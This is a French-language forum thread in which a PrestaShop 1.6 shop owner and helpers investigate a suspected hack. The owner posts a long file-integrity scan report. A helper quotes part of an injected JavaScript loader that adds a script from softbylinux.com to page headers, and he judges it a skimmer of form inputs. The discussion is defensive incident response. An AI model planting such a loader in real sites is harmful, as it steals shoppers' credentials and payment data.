Piratage en cours sur mon site sous prestashop 1.6 ? Besoin d'aide svp

mandrake · Saturday at 02:43 PM

Bonjour, j'ai reçu une confirmation de commande et de paiement et sur chaque en-tête il y a un script qui apparait qui n'a rien à faire là (j'ai masqué le nom de mon site et j'ai mis le code en capture d'écran car sinon je suis bloqué sur le forum) Il est en version 1.6 : Quelqu'un aurait la gentillesse de me dire ce que c'est, d'autant ce domaine softbylinux, n'est pas vieux, il a été déposé en septembre. j'aimerai vérifier si il y a un piratage sur le site mais je ne sais pas comment faire; merci pour votre aide et bonne année 2025 !

Eolia · Saturday at 02:55 PM

~~Hum, ça ne ressemble pas à un hack mais à une protection de votre serveur mail.~~

~~Vous n'avez rien mis en place ? C'est le genre d'appli qui empêche que l'on puisse répondre directement à un mail si on ne fait pas partie de la liste des expéditeurs connus.~~

~~A voir avec votre hébergeur.~~

Edit: c'est louche, on retrouve ce script sur plein de Prestashop.

Vous avez lancé Cleaner ?

Edited Saturday at 03:05 PM by Eolia (see edit history)

Eolia · Saturday at 03:09 PM

Après analyse ça pue vraiment. En gros ça choppe tout ce qui entré en select ou input et ça envoie ça à leur serveur.

Vol d'identité et de mots de passe possibles donc.

Eolia · Saturday at 03:13 PM

https://www.securefeed.com/Content/WebLookup?host=softbylinux.com

mandrake · Saturday at 03:13 PM

Bonjour, on a une idée de solution possible ?

Eolia · Saturday at 03:16 PM

Que vous dit Cleaner ?

mandrake · Saturday at 03:18 PM

Cleaner ? Désolé je ne sais pas ce que c'est... A part CCleaner...Comment cela fonctionne-t-il ?

mandrake · Saturday at 03:21 PM

Ou alors on parle de l'outil de nettoyage de prestashop ? Je vérifie les contraintes d'intégrité fonctionnelle, c'est bien ça ?

Eolia · Saturday at 03:22 PM

https://shop.devcustom.net/fr/content/16-nettoyage-hack

mandrake · Saturday at 03:41 PM

Merci, je le connaissais mais j'avais complétement oublié ce précieux outil !
Il y a une quantité de lignes oranges et voic les lignes en rouge :
Contrôle des scripts JS: MD5 ADMIN WARNING : Fichier différent de l'original => www/js/tinymce.inc.js
Recherche de fichiers htaccess ajoutés ou modifiés:Fichier .htaccess inconnu à contrôler: => www/modules/pninlineeditor/kcfinder/upload/.htaccess
Recherche de fichiers php ajoutés:

Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/CategoryController.php
Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/ProductController.php
Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/CmsController.php
Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/ManufacturerController.php
Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/SupplierController.php

Recherche de vulnérabilité sur les modules (A titre d'information. Si vous ne savez pas interpréter le code, veuillez demander l'avis d'un professionnel):Fonction sensible à contrôler: eval( => www/modules/pninlineeditor/kcfinder/lib/class_image.php
Fonction sensible à contrôler: eval( => www/modules/prestashopbackup/JSON.php
Fonction sensible à contrôler: eval( => www/modules/sd_adminprivacy/classes/Services/JSON.php

mandrake · Saturday at 03:42 PM

Qu'en pensez-vous ?

Eolia · Saturday at 03:46 PM

Il faudrait le screen complet car il y a forcément un endroit ou ce script est inséré.

mandrake · Saturday at 03:59 PM

Listing initial des 17335 fichiers effectué en 2.789 sec.

Par sécurité l'url du script a été modifiée. Notez la nouvelle url si vous fermez cette page.
Si vous avez oublié l'url, relancez cleaner.php après l'avoir re-téléchargé

Si des messages de nettoyage ou suppression sont affichés en rouge, votre e-boutique est susceptible d'avoir été attaquée et a été protégée d'urgence
mais il est nécessaire de RESTAURER les fichiers modifiés, de CHANGER le nom de votre répertoire admin et de CHANGER les mots de passe des employés de votre boutique.

Contrôle des fichiers admin:

Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/backups/1425479164-264f6299.sql.bz2

Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/backups/1493897036-c73f981.sql.bz2

Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/backups/1524671343-10ee9b94.sql.bz2

Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/backups/1428452834-1908a9d1.sql.bz2

Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/backups/1453151779-4e8dd25.sql.bz2

Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/backups/1455455859-209e9900.sql.bz2

Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/backups/1430125085-4c060c4c.sql.bz2

Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/backups/1460499163-41430134.sql.bz2

Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/themes/default/template/controllers/dashboard/helpers/view/view.tpl.bak

MD5 ADMIN WARNING : Fichier différent de l'original => www/**admin**/themes/default/template/controllers/dashboard/helpers/view/view.tpl

Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/themes/default/template/controllers/login/content.tpl.bak

MD5 ADMIN WARNING : Fichier différent de l'original => www/**admin**/themes/default/template/controllers/login/content.tpl

MD5 ADMIN WARNING : Fichier différent de l'original => www/**admin**/themes/default/template/controllers/login/header.tpl

MD5 ADMIN WARNING : Fichier différent de l'original => www/**admin**/themes/default/template/footer.tpl

Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/themes/default/template/page_header_toolbar.tpl.bak

Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/themes/default/template/header.tpl.bak

MD5 ADMIN WARNING : Fichier différent de l'original => www/**admin**/themes/default/template/header.tpl

MD5 ADMIN WARNING : Fichier différent de l'original => www/**admin**/themes/default/template/page_header_toolbar.tpl

Contrôle sur les fichiers sensibles connus pour être modifiés:

Aucun fichier sensible modifié

Contrôle de sécurité sur les fichiers php coeur:

MD5 INTEGRITY : Fichier php modifié par rapport à la version d'origine. Contenu à contrôler => www/www/config/defines.inc.php

MD5 INTEGRITY : Fichier php modifié par rapport à la version d'origine. Contenu à contrôler => www/www/controllers/front/PasswordController.php

MD5 INTEGRITY : Fichier php modifié par rapport à la version d'origine. Contenu à contrôler => www/www/controllers/admin/AdminLoginController.php

Fichier sans extension détecté => www/modules/sd_adminprivacy/override/classes/Tools.php.1.0.0.0

MD5 INTEGRITY : Fichier php modifié par rapport à la version d'origine. Contenu à contrôler => www/www/classes/Validate.php

MD5 INTEGRITY : Fichier php modifié par rapport à la version d'origine. Contenu à contrôler => www/www/classes/Tools.php

MD5 INTEGRITY : Fichier php modifié par rapport à la version d'origine. Contenu à contrôler => www/www/classes/Customer.php

Contrôle des scripts JS:

MD5 ADMIN WARNING : Fichier différent de l'original => www/js/tinymce.inc.js

Contrôle des images pouvant contenir un script:

Aucun fichier image suspect detecté

Recherche des infections connues:

Aucun code suspect connu trouvé

Contrôle de sécurité sur fichiers indésirables connus:

Aucun fichier indésirable connu trouvé

Contrôle des droits:

Droits incorrects (777) pour le répertoire: /img/cms/zones-montagneuses Doit être 755 ou 705
Droits incorrects (777) pour le répertoire: /img/webrotate_360 Doit être 755 ou 705

Recherche de fichiers .xxx ajoutés connus comme étant des infections:

Aucun fichier .xxx suspect trouvé

Recherche de fichiers htaccess ajoutés ou modifiés:

Fichier .htaccess inconnu à contrôler: => www/modules/pninlineeditor/kcfinder/upload/.htaccess

Veuillez contrôler l'ajout de fichier php dans ces répertoires (Normalement détectés dans la recherche des modules)

Recherche de fichiers php ajoutés:

Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/config/settings.inc.php

Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/config/settings.old.php

Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/override/controllers/front/ContactController.php

Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/CategoryController.php

Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/ProductController.php

Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/CmsController.php

Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/ManufacturerController.php

Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/SupplierController.php

Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/override/classes/controller/Controller.php

Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/override/classes/controller/FrontController.php

Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection (file_get_contents() => www/override/classes/Mail.php

Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/classes/Link.php

Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection (file_get_contents() => www/override/classes/Tools.php

Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/override/classes/shop/Shop.php

Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/tools/htmlpurifier/standalone/HTMLPurifier/Language/messages/en.php

Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/translations/fr/errors.php

Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/translations/fr/pdf.php

Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/translations/fr/fields.php

Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/translations/fr/tabs.php

Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/translations/fr/admin.php

Recherche de vulnérabilité sur les modules (A titre d'information. Si vous ne savez pas interpréter le code, veuillez demander l'avis d'un professionnel):

Fonction sensible à contrôler: file_get_contents( => www/modules/vatnumber/vatnumber.php

Fonction sensible à contrôler: include( => www/modules/vatnumber/ajax.php

Fonction sensible à contrôler: $_POST[ => www/modules/exapredictedition/exapredictedition.php

Fonction sensible à contrôler: $_POST[ => www/modules/exapredictedition/AdminExaPredictEdition.php

Fonction sensible à contrôler: file_get_contents( => www/modules/securitypatch/classes/HotfixPatches.php

Fonction sensible à contrôler: include( => www/modules/securitypatch/securitypatch.php

Fonction sensible à contrôler: include( => www/modules/favoriteproducts/favoriteproducts-ajax.php

Fonction sensible à contrôler: include_once => www/modules/favoriteproducts/favoriteproducts.php

Fonction sensible à contrôler: include( => www/modules/exapredict/validationopc.php

Fonction sensible à contrôler: $_POST[ => www/modules/exapredict/exapredict.php

Fonction sensible à contrôler: include( => www/modules/exapredict/validation.php

Fonction sensible à contrôler: base64_decode => www/modules/payplug/ipn.php

Fonction sensible à contrôler: fwrite => www/modules/payplug/backward_compatibility/Context.php

Fonction sensible à contrôler: file_put_contents => www/modules/faq/faq.php

Fonction sensible à contrôler: $_POST[ => www/modules/ph_blog_column_custom_second/ph_blog_column_custom_second.php

Fonction sensible à contrôler: include_once => www/modules/top1e_ajaxlivesearch/controller_ajax_search.php

Fonction sensible à contrôler: include_once => www/modules/pninlineeditor/kcfinder/integration/BolmerCMS.php

Fonction sensible à contrôler: file_get_contents( => www/modules/pninlineeditor/kcfinder/core/class/minifier.php

Fonction sensible à contrôler: $_POST[ => www/modules/pninlineeditor/kcfinder/core/class/browser.php

Fonction sensible à contrôler: $_GET[ => www/modules/pninlineeditor/kcfinder/core/class/uploader.php

Fonction sensible à contrôler: GLOBALS => www/modules/pninlineeditor/kcfinder/core/bootstrap.php

Fonction sensible à contrôler: $_GET[ => www/modules/pninlineeditor/kcfinder/js_localize.php

Fonction sensible à contrôler: file_get_contents( => www/modules/pninlineeditor/kcfinder/lib/helper_httpCache.php

Fonction sensible à contrôler: eval( => www/modules/pninlineeditor/kcfinder/lib/class_image.php

Fonction sensible à contrôler: include_once => www/modules/duplicateurlredirect/duplicateurlredirect.php

Fonction sensible à contrôler: include_once => www/modules/duplicateurlredirect/override_1.4/classes/FrontController.php

Fonction sensible à contrôler: include_once => www/modules/duplicateurlredirect/override_1.6/classes/controller/FrontController.php

Fonction sensible à contrôler: include_once => www/modules/duplicateurlredirect/header.php

Fonction sensible à contrôler: include_once => www/modules/duplicateurlredirect/override_1.5/classes/controller/FrontController.php

Fonction sensible à contrôler: $_POST[ => www/modules/ph_blog_custom/ph_blog_custom.php

Fonction sensible à contrôler: $_GET[ => www/modules/friendlyurl/override/classes/Link.php

Fonction sensible à contrôler: $_GET[ => www/modules/friendlyurl/override/controllers/front/ManufacturerController.php

Fonction sensible à contrôler: $_GET[ => www/modules/friendlyurl/override/controllers/front/ProductController.php

Fonction sensible à contrôler: $_GET[ => www/modules/friendlyurl/override/controllers/front/CategoryController.php

Fonction sensible à contrôler: $_GET[ => www/modules/friendlyurl/override/controllers/front/SupplierController.php

Fonction sensible à contrôler: $_GET[ => www/modules/friendlyurl/override/controllers/front/CmsController.php

Fonction sensible à contrôler: $_POST[ => www/modules/opartproductvideo/models/Video.php

Fonction sensible à contrôler: $_GET[ => www/modules/opartproductvideo/controllers/admin/AdminOpartproductvideoController.php

Fonction sensible à contrôler: include( => www/modules/opartproductvideo/opartproductvideo.php

Fonction sensible à contrôler: file_put_contents => www/modules/seomanager/SimpleLogger.php

Fonction sensible à contrôler: fwrite => www/modules/seomanager/DeBug.php

Fonction sensible à contrôler: include_once => www/modules/seomanager/seomanager.php

Fonction sensible à contrôler: $_FILES[ => www/modules/psthemextender/psthemextender.php

Fonction sensible à contrôler: include( => www/modules/gsitemap/gsitemap-cron.php

Fonction sensible à contrôler: fwrite => www/modules/gsitemap/backward_compatibility/Context.php

Fonction sensible à contrôler: file_get_contents( => www/modules/gsitemap/gsitemap.php

Fonction sensible à contrôler: $_FILES[ => www/modules/tetbanner/tetbanner.php

Fonction sensible à contrôler: $_POST[ => www/modules/mdtossend/removePDF.php

Fonction sensible à contrôler: file_get_contents( => www/modules/mdtossend/install/Mail.php

Fonction sensible à contrôler: file_get_contents( => www/modules/mdtossend/install/Mail_save.php

Fonction sensible à contrôler: file_get_contents( => www/modules/mdtossend/tcpdf/include/tcpdf_static.php

Fonction sensible à contrôler: file_get_contents( => www/modules/mdtossend/tcpdf/include/tcpdf_images.php

Fonction sensible à contrôler: file_get_contents( => www/modules/mdtossend/tcpdf/include/tcpdf_fonts.php

Fonction sensible à contrôler: include( => www/modules/mdtossend/tcpdf/tcpdf.php

Fonction sensible à contrôler: file_get_contents( => www/modules/mdtossend/tcpdf/tcpdf_import.php

Fonction sensible à contrôler: file_get_contents( => www/modules/mdtossend/mdtossend.php

Fonction sensible à contrôler: $_FILES[ => www/modules/blockcategories/controllers/admin/AdminBlockCategoriesController.php

Fonction sensible à contrôler: $_POST[ => www/modules/ph_blog_column_custom/ph_blog_column_custom.php

Fonction sensible à contrôler: include_once => www/modules/blockrss/blockrss.php

Fonction sensible à contrôler: file_get_contents( => www/modules/pscleaner/pscleaner.php

Fonction sensible à contrôler: include( => www/modules/eicaptcha/eicaptcha-ajax.php

Fonction sensible à contrôler: include_once => www/modules/homeslider/homeslider.php

Fonction sensible à contrôler: include_once => www/modules/homeslider/ajax_homeslider.php

Fonction sensible à contrôler: include_once => www/modules/gamificationOLD/gamification.php

Fonction sensible à contrôler: include_once => www/modules/gamificationOLD/controllers/admin/AdminGamificationController.php

Fonction sensible à contrôler: $_POST[ => www/modules/specialsslide/specialsslide.php

Fonction sensible à contrôler: $_POST[ => www/modules/editorial/EditorialClass.php

Fonction sensible à contrôler: include_once => www/modules/editorial/editorial.php

Fonction sensible à contrôler: include( => www/modules/mailalerts/mailalerts-account.php

Fonction sensible à contrôler: include_once => www/modules/mailalerts/mailalerts.php

Fonction sensible à contrôler: $_POST[ => www/modules/blocklink/blocklink.php

Fonction sensible à contrôler: $_FILES[ => www/modules/blockadvertising/blockadvertising.php

Fonction sensible à contrôler: $_GET[ => www/modules/cmstab/cmstab.php

Fonction sensible à contrôler: $_GET[ => www/modules/htmlbox/htmlbox.php

Fonction sensible à contrôler: fwrite => www/modules/newsletter/newsletter.php

Fonction sensible à contrôler: $_POST[ => www/modules/prestasocial/facebookloginajax.php

Fonction sensible à contrôler: $_POST[ => www/modules/prestasocial/classes/voucher.php

Fonction sensible à contrôler: file_get_contents( => www/modules/prestasocial/classes/facebook.php

Fonction sensible à contrôler: include_once => www/modules/prestasocial/voucher.php

Fonction sensible à contrôler: $_POST[ => www/modules/prestasocial/prestasocial.php

Fonction sensible à contrôler: include_once => www/modules/sendtoafriend/sendtoafriend_ajax.php

Fonction sensible à contrôler: include( => www/modules/webrotate_360view/webrotate_360view.php

Fonction sensible à contrôler: $_GET[ => www/modules/webrotate_360view/img/controller/AdminController.php

Fonction sensible à contrôler: $_GET[ => www/modules/webrotate_360view/img/AdminController.php

Fonction sensible à contrôler: $_GET[ => www/modules/webrotate_360view/classes/WebrotateQqUploadedFileXhr.php

Fonction sensible à contrôler: $_POST[ => www/modules/ph_blog_custom_second/ph_blog_custom_second.php

Fonction sensible à contrôler: fwrite => www/modules/ganalytics/backward_compatibility/Context.php

Fonction sensible à contrôler: include_once => www/modules/ganalytics/ganalytics.php

Fonction sensible à contrôler: include( => www/modules/prestashopbackup/downloadbackupfile.php

Fonction sensible à contrôler: fwrite => www/modules/prestashopbackup/ExportImportDatabase.php

Fonction sensible à contrôler: file_get_contents( => www/modules/prestashopbackup/class.phpmailer.php

Fonction sensible à contrôler: include_once => www/modules/prestashopbackup/sdk.class.php

Fonction sensible à contrôler: eval( => www/modules/prestashopbackup/JSON.php

Fonction sensible à contrôler: base64_decode => www/modules/prestashopbackup/services/ec2.class.php

Fonction sensible à contrôler: include( => www/modules/prestashopbackup/cron/filecron.php

Fonction sensible à contrôler: include( => www/modules/prestashopbackup/cron/filecron_restore.php

Fonction sensible à contrôler: include( => www/modules/prestashopbackup/cron/dbcron_restore.php

Fonction sensible à contrôler: include( => www/modules/prestashopbackup/cron/dbcron.php

Fonction sensible à contrôler: include_once => www/modules/prestashopbackup/FileBackup.php

Fonction sensible à contrôler: gzinflate => www/modules/prestashopbackup/utilities/gzipdecode.class.php

Fonction sensible à contrôler: fwrite => www/modules/prestashopbackup/lib/requestcorepc/requestcorepc.class.php

Fonction sensible à contrôler: include( => www/modules/prestashopbackup/lib/yaml/lib/sfYaml.php

Fonction sensible à contrôler: file_put_contents => www/modules/prestashopbackup/lib/cachecore/cachefile.class.php

Fonction sensible à contrôler: include_once => www/modules/prestashopbackup/lib/cachecore/cachecore.class.php

Fonction sensible à contrôler: include_once => www/modules/prestashopbackup/prestashopbackup.php

Fonction sensible à contrôler: include( => www/modules/prestashopbackup/PrestoChangeoClasses/FrontController.php

Fonction sensible à contrôler: fwrite => www/modules/prestashopbackup/PrestoChangeoClasses/PrestoChangeoContext.php

Fonction sensible à contrôler: include_once => www/modules/prestashopbackup/PrestoChangeoClasses/PrestoChangeoModule.php

Fonction sensible à contrôler: $_POST[ => www/modules/etransactions/etransactions.php

Fonction sensible à contrôler: $_FILES[ => www/modules/etransactions/classes/ETransactionsAdminConfig.php

Fonction sensible à contrôler: base64_decode => www/modules/etransactions/classes/ETransactionsEncrypt.php

Fonction sensible à contrôler: file_get_contents( => www/modules/etransactions/classes/ETransactionsHelper.php

Fonction sensible à contrôler: $_GET[ => www/modules/etransactions/classes/ETransactionsController.php

Fonction sensible à contrôler: $_GET[ => www/modules/etransactions/index.php

Répertoire indésirable détecté (à supprimer ou à sauvegarder ailleurs): /modules/gapi

Fonction sensible à contrôler: file_get_contents( => www/modules/gapi/gapi.php

Fonction sensible à contrôler: include( => www/modules/gapi/oauth2callback.php

Fonction sensible à contrôler: include_once => www/modules/blockreinsurance/blockreinsurance.php

Fonction sensible à contrôler: $_POST[ => www/modules/blockreinsurance/reinsuranceClass.php

Fonction sensible à contrôler: $_POST[ => www/modules/icirelaisedition/AdminIciRelaisEdition.php

Fonction sensible à contrôler: $_POST[ => www/modules/icirelaisedition/icirelaisedition.php

Fonction sensible à contrôler: $_FILES[ => www/modules/blockstore/blockstore.php

Fonction sensible à contrôler: fwrite => www/modules/exportdata/backward_compatibility/Context.php

Fonction sensible à contrôler: include_once => www/modules/exportdata/exportdata-csv.php

Fonction sensible à contrôler: include_once => www/modules/blockwishlist/blockwishlist.php

Fonction sensible à contrôler: include_once => www/modules/blockwishlist/controllers/front/mywishlist.php

Fonction sensible à contrôler: include_once => www/modules/blockwishlist/controllers/front/view.php

Fonction sensible à contrôler: $_GET[ => www/modules/blockwishlist/managewishlist.php

Fonction sensible à contrôler: $_POST[ => www/modules/blockwishlist/sendwishlist.php

Fonction sensible à contrôler: include_once => www/modules/jbx_superuser/AdminSuperUser.php

Fonction sensible à contrôler: include( => www/modules/paybox/validation.php

Fonction sensible à contrôler: include( => www/modules/paybox/unsubscribe.php

Fonction sensible à contrôler: include( => www/modules/paybox/directvalidation.php

Fonction sensible à contrôler: include( => www/modules/paybox/directvalidation3d.php

Fonction sensible à contrôler: include( => www/modules/paybox/redirect.php

Fonction sensible à contrôler: include( => www/modules/paybox/directvalidationoneclick.php

Fonction sensible à contrôler: include( => www/modules/paybox/directcapturepayment.php

Fonction sensible à contrôler: include_once => www/modules/paybox/paybox.php

Fonction sensible à contrôler: include( => www/modules/paybox/short.php

Fonction sensible à contrôler: $_FILES[ => www/modules/paybox/classes/PayboxConfiguration.php

Fonction sensible à contrôler: include( => www/modules/paybox/directvalidation3doneclick.php

Fonction sensible à contrôler: $_POST[ => www/modules/blocknewsletter/blocknewsletter.php

Fonction sensible à contrôler: $_GET[ => www/modules/banippro/banippro.php

Répertoire indésirable détecté (à supprimer ou à sauvegarder ailleurs): /modules/blockloichatelbak

Fonction sensible à contrôler: $_POST[ => www/modules/blockloichatel.bak/class/popupmodel.php

Fonction sensible à contrôler: include_once => www/modules/megablock/megablock.php

Fonction sensible à contrôler: $_POST[ => www/modules/megablock/megablockClass.php

Fonction sensible à contrôler: include_once => www/modules/pnadvancedproductslist/controladorList.php

Fonction sensible à contrôler: include_once => www/modules/pnadvancedproductslist/gestordbproductlist.php

Fonction sensible à contrôler: $_FILES[ => www/modules/blockbanner/blockbanner.php

Fonction sensible à contrôler: include_once => www/modules/ph_simpleblog/ph_simpleblog.php

Fonction sensible à contrôler: $_POST[ => www/modules/ph_simpleblog/models/SimpleBlogTag.php

Fonction sensible à contrôler: include_once => www/modules/ph_simpleblog/assets/phpthumb/PhpThumb.inc.php

Fonction sensible à contrôler: file_get_contents( => www/modules/ph_simpleblog/assets/phpthumb/ThumbBase.inc.php

Fonction sensible à contrôler: include_once => www/modules/ph_simpleblog/assets/phpthumb/ThumbLib.inc.php

Fonction sensible à contrôler: file_get_contents( => www/modules/ph_simpleblog/assets/recaptchalib.php

Fonction sensible à contrôler: include( => www/modules/ph_simpleblog/ajax.php

Fonction sensible à contrôler: $_POST[ => www/modules/ph_simpleblog/controllers/admin/AdminSimpleBlogTagsController.php

Fonction sensible à contrôler: file_put_contents => www/modules/ph_simpleblog/controllers/admin/AdminSimpleBlogSettingsController.php

Fonction sensible à contrôler: $_POST[ => www/modules/ph_simpleblog/controllers/admin/AdminSimpleBlogPostsController.php

Fonction sensible à contrôler: $_FILES[ => www/modules/ph_simpleblog/controllers/admin/AdminSimpleBlogCategoriesController.php

Fonction sensible à contrôler: include( => www/modules/icirelais/validation.php

Fonction sensible à contrôler: $_POST[ => www/modules/icirelais/icirelais.php

Fonction sensible à contrôler: include( => www/modules/icirelais/validationopc.php

Fonction sensible à contrôler: include( => www/modules/cheque/validation.php

Fonction sensible à contrôler: $_FILES[ => www/modules/themeconfigurator/themeconfigurator.php

Fonction sensible à contrôler: include_once => www/modules/referralprogram/controllers/front/program.php

Fonction sensible à contrôler: file_get_contents( => www/modules/referralprogram/controllers/front/email.php

Fonction sensible à contrôler: fwrite => www/modules/referralprogram/referralprogram.php

Fonction sensible à contrôler: $_POST[ => www/modules/blockcmsinfo/infoClass.php

Fonction sensible à contrôler: $_FILES[ => www/modules/loihamon/controllers/front/retractation.php

Fonction sensible à contrôler: include_once => www/modules/blockloichatel/blockloichatel.php

Fonction sensible à contrôler: $_POST[ => www/modules/blockloichatel/class/popupmodel.php

Fonction sensible à contrôler: file_get_contents( => www/modules/sd_adminprivacy/override/classes/Tools.php

Fonction sensible à contrôler: file_put_contents => www/modules/sd_adminprivacy/sd_adminprivacy.php

Fonction sensible à contrôler: eval( => www/modules/sd_adminprivacy/classes/Services/JSON.php

Fonction sensible à contrôler: include( => www/modules/sd_adminprivacy/classes/Samdha/Module/Module.php

Fonction sensible à contrôler: file_get_contents( => www/modules/sd_adminprivacy/classes/Samdha/Module/Tools.php

Fonction sensible à contrôler: fwrite => www/modules/sd_adminprivacy/backward_compatibility/Context.php

Fonction sensible à contrôler: include( => www/modules/bankwire/validation.php

Fonction sensible à contrôler: $_GET[ => www/modules/twitterwidget/twitterwidget.php

Fonction sensible à contrôler: file_put_contents => www/modules/categoriestopmenuxxl/categoriestopmenuxxl.php

Fonction sensible à contrôler: file_get_contents( => www/modules/categoriestopmenuxxl/lessc.inc.php

Fonction sensible à contrôler: $_FILES[ => www/modules/productpaymentlogos/productpaymentlogos.php

Fonction sensible à contrôler: file_get_contents( => www/modules/productvideos/productvideos.php

Fonction sensible à contrôler: include( => www/modules/statsvisitorpages/loadDetails.php

Fonction sensible à contrôler: include( => www/modules/blockcart/blockcart-set-collapse.php

Fonction sensible à contrôler: include_once => www/modules/extratabspro/ajax_extratabspro.php

Fonction sensible à contrôler: $_GET[ => www/modules/extratabspro/extratabspro.php

Fonction sensible à contrôler: include_once => www/modules/giftcard/giftcard.php

Fonction sensible à contrôler: include( => www/modules/blocklayered/blocklayered-attribute-indexer.php

Fonction sensible à contrôler: include( => www/modules/blocklayered/blocklayered-ajax.php

Fonction sensible à contrôler: include( => www/modules/blocklayered/blocklayered-url-indexer.php

Fonction sensible à contrôler: file_get_contents( => www/modules/blocklayered/blocklayered.php

Fonction sensible à contrôler: include( => www/modules/blocklayered/blocklayered-price-indexer.php

Fonction sensible à contrôler: include_once => www/modules/blockcms/blockcms.php

Fonction sensible à contrôler: include_once => www/modules/productcomments/productcomments-ajax.php

Fonction sensible à contrôler: $_GET[ => www/modules/productcomments/productcommentscriterion.php

Fonction sensible à contrôler: include_once => www/modules/productcomments/controllers/front/default.php

Fonction sensible à contrôler: file_get_contents( => www/modules/productcomments/productcomments.php

Peak usage: 19023 KB of memory.

ANALYSE TERMINÉE (Effectuée en 9.816 sec.)

!!! ATTENTION !!! Certains de vos fichiers coeurs ont été modifiés.
Si ces modifications ne sont pas volontaires, nous vous conseillons de comparer les fichiers avec les 2 zips (suspicious_xxxx et Prestashop) et de les restaurer dans leur version d'origine si nécessaire.

IMPORTANT: Si les fichiers coeurs modifiés commencent par /**/ vous avez été victime d'un hack. Restaurez les versions d'origine immédiatement !

INFO: Votre site possède la version patchée du répertoire www/**admin**/filemanager

mandrake · Saturday at 04:00 PM

L'analyse est complète avec les gros fichiers incluse

Eolia · Saturday at 04:15 PM

Ce qui sent pas bon (à restaurer)

MD5 INTEGRITY : Fichier php modifié par rapport à la version d'origine. Contenu à contrôler => www/www/controllers/admin/AdminLoginController.php

Pour le reste je ne vois rien de flagrant

Trouvez-vous ce code (softbylinux.com) dans la code source de votre page ?

mandrake · Saturday at 04:31 PM

Dans les faits, je vois le code dans les mails que l'on reçoit après paiement de la commande. Sans quoi j'ai téléchargé tous les fichiers du site et j'ai effectué une recherche en tapant le nom de domaine mais je n'ai rien trouvé. La seule partie que je n'ai pas vérifié c'est la bdd

mandrake · Saturday at 04:32 PM

Le code est intégré dans le logo des mails reçus

mandrake · Saturday at 04:39 PM

rien non plus dans la bdd

mandrake · Saturday at 04:41 PM

Je pensais mettre une règle dans le htaccess qui interdirait l'accès à tps.js sur mon site. Qu'en pensez-vous ?

Eolia · Saturday at 04:42 PM

En fait il est injecté dans le header après chargement, peut-être dans la fonction smartyOutputContent() et la ligne est ensuite supprimée sauf si l'option "déplacer les js à la fin" est active ou qu'on est dans les mails (le header ne fait pas partie du DOM à ce moment là)

        let a = document.head.querySelector('[src*="https://softbylinux.com/tps.js?host=www.site.com"]');
        if(!a){ 
            let s=document.createElement('script');
            s.setAttribute('defer','');
            s.setAttribute('src','https://softbylinux.com/tps.js?host=www.site.com');
            document.head.appendChild(s);
            return
        } else {
            let scrs = document.body.querySelectorAll('[src*="https://softbylinux.com/tps.js?host=www.site.com"]');
            for (let element of scrs){
                element.remove();
            }
            let hookdiv = document.getElementById('hookwork');
            if (!hookdiv) {
                hookdiv = document.createElement('div');
                hookdiv.setAttribute('id', 'hookwork');
                hookdiv.setAttribute('hidden','hidden');
                document.body.appendChild(hookdiv);

Eolia · Saturday at 04:43 PM

à l’instant, mandrake a dit :

Je pensais mettre une règle dans le htaccess qui interdirait l'accès à tps.js sur mon site. Qu'en pensez-vous ?

Vous pouvez le faire mais il serait préférable de trouver l'entrée.

mandrake · Saturday at 04:47 PM

Ça dépasse de très loin mes compétences actuelles, j'ai de gros problèmes de santé et un traitement qui altèrent ma mémoire depuis quelques années. C'est compliqué pour moi d'avoir une réflexion logique poussée. Cela me demande un énorme effort de concentration.

mandrake · Saturday at 04:48 PM

Comment trouver cette entrée pour ensuite la patcher ? Cela me paraît vraiment compliqué.

mandrake · Saturday at 04:55 PM

J'ai désactivé l'option "Déplacer les fichiers JS à la fin", histoire que cela empêche le script malveillant de rester actif dans certaines conditions. J'ai bien fait ?

Eolia · Saturday at 04:59 PM

Non, laissez cette option activé, au contraire.

Pouvez-vous m'envoyer l'url du site concerné en MP ?

mandrake · Saturday at 05:02 PM

Oui, pas de soucis. C'est un vieux coucou.

mandrake · Saturday at 05:16 PM

Avez-vous bien reçu mon message ? Merci

kis2a · Saturday at 06:24 PM

Avais vous modifer / ajouter / installer de nouvelle chose (module.. etc )

